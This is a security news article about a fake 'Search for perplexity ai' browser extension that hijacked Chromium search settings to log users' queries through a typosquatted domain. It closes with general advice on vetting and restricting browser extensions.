The digital landscape is currently witnessing a troubling new trend where the trusted names of popular AI tools are being weaponized against unsuspecting users. A recent discovery by Microsoft analysts has shed light on a sophisticated malicious browser extension, disguised as the well-known AI search engine Perplexity AI. This deceptive tool, titled “Search for perplexity ai,” was crafted with such precision that it mirrored the look and feel of a legitimate productivity application. By operating under a fake identity, the extension exploited the trust users naturally place in recognizable brands, making it incredibly difficult for the average person to spot that they were being compromised the moment they installed the software.
At the technical heart of this operation was a clever exploitation of Chromium-based browsers. Once installed, the extension didn’t just sit on the toolbar; it quietly seized control of the browser’s default search settings. The level of interference was both deep and silent: every search query a user typed—even those entered mid-thought before hitting the “Enter” key—was stealthily routed through an attacker-controlled server before being forwarded to a legitimate search engine like Google or Bing. Because the final results appeared on a familiar search page, the victim experienced a seamless, “normal” browsing experience, while in the background, their data was being harvested by malicious actors.
What sets this particular threat apart from the standard “search hijacker” malware of the past is how it utilized modern browser technology to remain completely invisible. Rather than triggering clunky, obvious redirects that would alert a user, the extension employed browser-native APIs to blend its malicious activity into the background of daily internet use. Furthermore, the extension was supported by a complex server-side infrastructure. Every piece of data—including HTTP headers, user IP addresses, and user-agent strings—was meticulously logged. This confirmed that the operation was not a haphazard glitch, but a deliberate, architecturally sound system designed for long-term data collection and user profiling.
The deception went even deeper through the use of a typosquatted domain, “perplexity-ai[.]online.” By configuring the browser to treat this fake domain as the default search provider, the attackers ensured that every character typed into the address bar was intercepted and logged on their private infrastructure. The inclusion of powerful network permissions allowed the extension to monitor, redirect, and inspect traffic at a granular level. To make matters worse, the criminals included a deceptive “onboarding” page, which mimicked a professional product setup flow. This psychological tactic is designed to build a false sense of security, convincing the user that they are setting up a helpful new AI tool while the software is actually settling into their browser to begin its surveillance.
The threat’s modular design also reveals a concerning level of foresight by its creators. While only the Perplexity-specific ruleset was active at the time of discovery, researchers noted that the extension contained dormant rulesets for Google and Bing. This suggests that the attackers could have scaled their campaign of mass surveillance across virtually any platform with minimal effort. While Google has since removed the extension from the Chrome Web Store following responsible disclosure, the incident serves as a stark reminder of how vulnerable our browser environments are to these types of “AI-themed” social engineering campaigns.
In an era where AI tools are the latest hot commodity, users must be more vigilant than ever regarding what software they grant clearance to their browsers. To stay safe, it is crucial to verify the publisher and the specific URL of any extension before hitting ‘install,’ and to remain suspicious of tools that promise to “integrate” AI into your search bar. Organizations, meanwhile, should look into enforcing strict browser policies that limit installations to an approved whitelist and actively monitor for unusual outbound traffic. By replacing blind trust with a proactive security mindset, we can effectively mitigate the risk posed by these increasingly sophisticated digital shadows.

